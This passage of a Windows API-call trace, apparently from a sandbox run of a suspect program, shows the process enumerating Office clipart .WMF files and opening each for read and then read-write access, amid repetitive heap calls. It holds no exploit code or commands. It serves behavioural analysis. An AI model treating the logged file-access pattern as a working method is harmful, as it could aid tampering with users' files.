(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0103.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.102] AreFileApisANSI () returned 1 [0103.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.103] AreFileApisANSI () returned 1 [0103.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 69 [0103.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.104] GetFileType (hFile=0x368) returned 0x1 [0103.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.104] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.104] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.104] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.105] CloseHandle (hObject=0x368) returned 1 [0103.105] AreFileApisANSI () returned 1 [0103.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 69 [0103.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.105] GetFileType (hFile=0x368) returned 0x1 [0103.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.105] CloseHandle (hObject=0x368) returned 1 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0103.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.106] AreFileApisANSI () returned 1 [0103.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0103.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 69 [0103.107] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a4)) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0103.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.107] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f26, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00092_.WMF", cAlternateFileName="")) returned 1 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0103.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0103.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.108] AreFileApisANSI () returned 1 [0103.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0103.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.108] AreFileApisANSI () returned 1 [0103.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0103.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 69 [0103.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.108] GetFileType (hFile=0x368) returned 0x1 [0103.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0103.109] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.109] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.109] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.109] CloseHandle (hObject=0x368) returned 1 [0103.109] AreFileApisANSI () returned 1 [0103.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0103.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 69 [0103.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.109] GetFileType (hFile=0x368) returned 0x1 [0103.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0103.110] CloseHandle (hObject=0x368) returned 1 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.111] AreFileApisANSI () returned 1 [0103.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 69 [0103.111] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f26)) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0103.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 